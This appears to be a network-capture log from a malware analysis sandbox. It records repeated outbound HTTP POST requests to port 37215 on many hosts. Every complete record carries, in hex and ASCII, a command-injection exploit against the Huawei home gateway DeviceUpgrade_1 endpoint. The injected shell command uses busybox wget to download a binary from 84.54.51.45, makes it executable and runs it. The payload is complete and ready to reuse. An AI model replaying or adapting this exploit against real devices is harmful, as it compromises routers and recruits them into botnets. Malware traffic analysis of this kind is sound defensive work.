                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2072192.168.2.154541841.9.186.6237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667813063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2073192.168.2.154167241.82.81.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667814970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2074192.168.2.155557241.154.220.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667834044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2075192.168.2.154836041.91.102.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667857885 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2076192.168.2.155292441.138.202.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668020964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2077192.168.2.153316241.170.150.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668066025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2078192.168.2.153899641.25.242.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668088913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2079192.168.2.154839841.191.92.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668090105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2080192.168.2.153659441.19.200.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668102026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2081192.168.2.156064841.54.230.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668121099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
